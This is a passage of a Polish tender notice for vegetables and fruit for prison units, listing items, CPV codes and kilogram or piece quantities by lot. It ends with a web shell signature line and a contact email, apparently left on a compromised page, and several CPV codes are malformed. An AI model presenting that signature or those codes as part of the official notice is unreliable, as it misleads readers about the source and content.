10
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, CPV: 03221100-7.
kg
300
11
Banany, 
CPV: 03222111-4.
kg
800
12
Grejpfruty, 
CPV: 03222230-4.
kg
800
13
Winogrona zielone, 
CPV: 032222340-8.
kg
400
14
Winogrona fioletowe, 
CPV: 032222340-8.
kg
400
15
Gruszki, 
CPV: 03222322-6.
kg
400
16
Kiwi, 
CPV: 03222118-3.
kg
300
17
Cytryny, 
CPV: 03222210-8.
kg
500
18
Jabłka - całe, średniej wielkości, 
CPV: 03222321-9.
kg
2000
19
Brzoskwinia (sezonowo), 
CPV: 03222332-9. 
kg
300
20
Pomarańcze , jednostka miary kg 
kg
500
21
Mandarynki , jednostka miary kg
kg
1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-6, 03.22.11.12-1, 03.22.12.70-9, 03.22.12.30-7, 03.22.13.10-2, 03.22.12.40-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2 (ZK Potulice, Kuchnia ,AŚ Bydgoszcz,OZ Bydgoszcz , ZK Koronowo, ZK Bydgoszcz-Fordon, Kuchnia, AŚ Chojnice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Ziemniaki jadalne - o średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, CPV: 03212100-6.
kg
1500
2
Marchew - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, CPV: 03221112-4
kg
800
3
Kapusta czerwona - w główkach, o minimalnej wadze główki 2,5 kg, CPV: 03221410-3. 
kg
400
4
Groch łuskany, połówki, 
CPV: 03221220-4. 
kg
400
5
Fasola typu Jaś, duża, 
CPV: 03221210-1. 
kg
400
6
Cebula - średniej wielkości, 
CPV: 03221112-1. 
kg
3000
7
Burak ćwikłowy - średniej wielkości, 
CPV: 03221111-7. 
kg
1000
8
Pietruszka korzeń - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, CPV: 03221100-7. 
kg
160
9
Nać pietruszki - o przeciętnej wadze pęczka ok. 100 g i maksymalnej długości 15 cm, CPV: 03221300-9.
kg
100
10
Koper - o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 15 cm, CPV: 03221300-9.
kg
100
11
Koper włoski - fenkuł, jednostka miary kilogram CPV: 03221300-9.
kg
50
12
Ogórek zielony - twardy, średniej wielkości, w całości, polny, CPV: 03221270-9.
kg
1000
13
Papryka surowa - czerwona, cała, 
CPV: 03221230-7.
kg
500
14
Pieczarka - o średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3cm do 5cm, CPV: 03221260-6. 
kg
700
15
Pomidor - czerwony, cały, średniej wielkości, polny, 
CPV: 03221240-0.
kg
1100
16
Por - oczyszczony, gruby, w całości, 
CPV: 03222230-4.
kg
150
17
Seler - duży, oczyszczony, bez liści, 
CPV: 03221100-7. 
kg
100
18
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.CPV: 03221100-7.
kg
50
19
Kapusta włoska - w główkach, o wadze główki od 1,8 kg do 4,0 kg, CPV: 03221410-3. 
kg
200
20
Kapusta biała - w główkach, o wadze główki od 2 kg do 4 kg, CPV: 03221410-3. 
kg
800
21
Kapusta pekińska, główki o minimalnej średnicy 10 cm i minimalnej długości 20 cm, CPV: 03221410-3. 
kg
800
22
Cukinia, 
CPV: 03221250-3.
kg
600
23
Bakłażan, jednostka miary kilogram CPV: 03221000-6
kg
200
24
Sałata głowiasta kl. I, 
CPV: 03221310-2.
szt.
500
25
Sałata lodowa główka, 
CPV: 03221310-2. 
szt.
600
26
Sałata karbowana czerwona główka, 
CPV: 03221310-2.
szt.
300
27
Kalafior, 
CPV: 03221420-6.
szt.
1000
28
Brokuły, 
CPV: 03221430-9.
szt.
1000
29
Pomidor koktajlowy tacka 500 g, 
CPV: 03221240-0.
szt.
450
30
Rzodkiewka, 
CPV: 03221100-7.
szt.
500
31
Mięta świeża doniczka, 
CPV: 03121100-6. 
szt.
30
32
Bazylia świeża doniczka, 
CPV: 03121100-6.
szt.
30
33
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, CPV: 03221100-7.
kg
350
34
Kapusta kwaszona z marchewką - bez konserwantów, 
CPV: 03221410-3. 
kg
600
35
Banany, 
CPV: 03222111-4.
kg
1000
36
Grejpfruty, 
CPV: 03222230-4.
kg
500
37
Winogrona zielone, 
CPV: 032222340-8.
kg
200
38
Winogrona fioletowe, 
CPV: 032222340-8.
kg
200
39
Gruszki, 
CPV: 03222322-6.
kg
600
40
Kiwi, 
CPV: 03222118-3.
kg
500
41
Ananas - jednostka miary szt. 
CPV: 03222240-7
szt
100
42
Cytryny, 
CPV: 03222210-8.
kg
800
43
Jabłka - całe, średniej wielkości, 
CPV: 03222321-9.
kg
1400
44
Arbuz - (sezonowo), 
CPV: 03222200-1.
kg
100
45
Brzoskwinia (sezonowo), 
CPV: 03222332-9. 
kg
600
46
Pomarańcze , jednostka miary kg CPV:03222220-1
kg
800
47
Mandarynki jednostka miary kg, CPV 03222240-7
kg
1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-6, 03.21.21.00-6, 03.22.11.12-4, 03.22.14.10-3, 03.22.12.20-4, 03.22.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3 (ZK Nr 1 Grudziądz, ZK Nr 2 Grudziądz).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Cebula - średniej wielkości, 
CPV: 03221112-1. 
kg
1000
2
Ogórek zielony - twardy, średniej wielkości, w całości, polny, CPV: 03221270-9.
kg
800
3
Papryka surowa - czerwona, cała, 
CPV: 03221230-7.
kg
200
4
Pomidor - czerwony, cały, średniej wielkości, polny, 
CPV: 03221240-0.
kg
1000
6
Sałata głowiasta kl. I, 
CPV: 03221310-2.
szt.
50
7
Kalafior, 
CPV: 03221420-6.
szt.
50
8
Brokuły, 
CPV: 03221430-9.
szt.
50
9
Pomidor koktajlowy tacka 500 g, 
CPV: 03221240-0.
szt.
150
10
Rzodkiewka, 
CPV: 03221100-7.
szt.
500
11
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, CPV: 03221100-7.
kg
300
12
Banany, 
CPV: 03222111-4.
kg

1500
13
Grejpfruty, 
CPV: 03222230-4.
kg
1200
14
Winogrona zielone, 
CPV: 032222340-8.
kg
500
15
Winogrona fioletowe, 
CPV: 032222340-8.
kg
500
16
Gruszki, 
CPV: 03222322-6.
kg
500
17
Kiwi, 
CPV: 03222118-3.
kg
400
18
Cytryny, 
CPV: 03222210-8.
kg
800
19
Jabłka - całe, średniej wielkości, 
CPV: 03222321-9.
kg
2500
20
Arbuz - (sezonowo), 
CPV: 03222200-1.
kg
100
21
Brzoskwinia (sezonowo), 
CPV: 03222332-9. 
kg
300
22
Pomarańcze , jednostka miary kg CPV: 03222220-1
kg
500
23
Mandarynki ,  jednostka miary kg CPV: 03222240-7
kg
800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-6, 03.22.11.12-1, 03.22.12.70-9, 03.22.12.30-7, 03.22.13.10-2, 03.22.14.20-6, 03.22.14.30-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa 4 (AŚ Inowrocław, AŚ Toruń ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Cebula - średniej wielkości, 
CPV: 03221112-1. 
kg
300
2
Ogórek zielony - twardy, średniej wielkości, w całości, polny, CPV: 03221270-9.
kg
500
3
Papryka surowa - czerwona, cała, 
CPV: 03221230-7.
kg
200
4
Pomidor - czerwony, cały, średniej wielkości, polny, CPV: 03221240-0.
kg
600
5
Sałata głowiasta kl. I, 
CPV: 03221310-2.
szt.
50
6
Kalafior, 
CPV: 03221420-6.
szt.
50
7
Brokuły, 
CPV: 03221430-9.
szt.
50
8
Pomidor koktajlowy tacka 500 g, 
CPV: 03221240-0.
szt.
150
9
Rzodkiewka, 
CPV: 03221100-7.
szt.
500
10
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, CPV: 03221100-7.
kg
400
11
Banany, 
CPV: 03222111-4.
kg
1000
12
Grejpfruty, 
CPV: 03222230-4.
kg
800
13
Winogrona zielone, 
CPV: 032222340-8.
kg
400
14
Winogrona fioletowe, 
CPV: 032222340-8.
kg
400
15
Gruszki, 
CPV: 03222322-6.
kg
400
16
Kiwi, 
CPV: 03222118-3.
kg
350
17
Cytryny, 
CPV: 03222210-8.
kg
700
18
Jabłka - całe, średniej wielkości, 
CPV: 03222321-9.
kg
2000
19
Arbuz - (sezonowo), 
CPV: 03222200-1.
kg
100
20
Brzoskwinia (sezonowo), 
CPV: 03222332-9. 
kg
300
21
Pomarańcze , jednostka miary kg CPV: 03222220-1
kg
500
22
Mandarynki ,  jednostka miary kg CPV: 03222240-7
kg
800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-6, 03.22.11.12-1, 03.22.12.70-9, 03.22.12.40-0, 03.22.13.10-2, 03.22.14.20-6, 03.22.14.30-9, 03.22.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com